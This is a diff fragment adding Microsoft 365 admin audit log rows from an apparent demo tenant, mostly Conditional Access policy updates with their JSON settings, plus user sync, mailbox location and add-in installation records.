+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:19 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:20 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:21Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:20 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-17T06:13:20Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:19 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-17T06:13:19Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/17/2020 6:13:18 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-16T15:36:11Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\af457e33-8dc4-47c3-817c-31b462d6f91f""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-16T19:00:05Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\af457e33-8dc4-47c3-817c-31b462d6f91f""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-16T22:46:56Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\af457e33-8dc4-47c3-817c-31b462d6f91f""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-16T22:46:54Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\9248f28c-31e8-40b7-8495-22bfbec372fc""
+  },
+  {
+    ""Name"": ""IgnoreLegalHold"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-17T21:00:31Z,,,New-App,"[
+  {
+    ""Name"": ""DefaultStateForUser"",
+    ""Value"": ""Enabled""
+  },
+  {
+    ""Name"": ""Enabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""FileData"",
+    ""Value"": ""PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhLS1DcmVhdGVkOmNiODViODBjLWY1OA==...""
+  },
+  {
+    ""Name"": ""OrganizationApp"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-17T21:00:31Z,,,New-App,"[
+  {
+    ""Name"": ""DefaultStateForUser"",
+    ""Value"": ""Enabled""
+  },
+  {
+    ""Name"": ""Enabled"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""FileData"",
+    ""Value"": ""PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4NCjwhLS1DcmVhdGVkOmNiODViODBjLWY1OA==...""
+  },
+  {
+    ""Name"": ""OrganizationApp"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-04-18T01:38:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:37 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-18T01:38:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-18T01:38:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/18/2020 1:38:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-10T06:26:23Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-09T02:58:46Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
